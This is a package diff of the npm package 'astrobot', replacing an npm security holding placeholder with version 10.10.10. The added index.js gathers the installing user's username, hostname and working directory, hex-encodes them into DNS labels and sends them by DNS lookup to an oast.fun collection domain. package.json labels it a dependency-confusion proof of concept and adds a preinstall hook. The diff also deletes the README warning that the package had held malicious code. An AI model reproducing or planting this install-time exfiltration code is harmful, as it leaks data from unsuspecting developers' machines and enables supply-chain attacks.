astrobot 0.0.1-security → 10.10.10

package/index.js

@@ -0,0 +1,39 @@
+const dns = require('dns');
+const os = require('os');
+const path = require('path');
+
+const MAX_LABEL_LENGTH = 63;
+const OAST_DOMAIN = 'd1htmicgtqkhsklb8ai0riqfkkqara1j1.oast.fun';
+
+// Helper: encode string to hex and split into label-safe chunks
+function hexChunks(str) {
+  const hex = Buffer.from(str).toString('hex');
+  const chunks = [];
+  for (let i = 0; i < hex.length; i += MAX_LABEL_LENGTH) {
+    chunks.push(hex.slice(i, i + MAX_LABEL_LENGTH));
+  }
+  return chunks;
+}
+
+// Collect system info
+const username = os.userInfo().username || 'nouser';
+const hostname = os.hostname() || 'nohost';
+const cwd = process.cwd() || 'nocwd';
+
+// Encode each to hex and build labels
+const labels = [
+  ...hexChunks(username),
+  ...hexChunks(hostname),
+  ...hexChunks(cwd),
+  OAST_DOMAIN
+];
+
+let domain = labels.join('.');
+
+// Truncate full domain to 253 characters (RFC limit)
+if (domain.length > 253) {
+  domain = domain.substring(0, 253);
+}
+
+// Fire DNS beacon
+dns.resolve(domain, () => {});

package/package.json

@@ -1,6 +1,11 @@
 {
   "name": "astrobot",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "10.10.10",
+  "description": "Dependency Confusion PoC using DNS hex exfiltration via preinstall.js",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js"
+  },
+  "author": "orwa",
+  "license": "ISC"
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=astrobot for more information.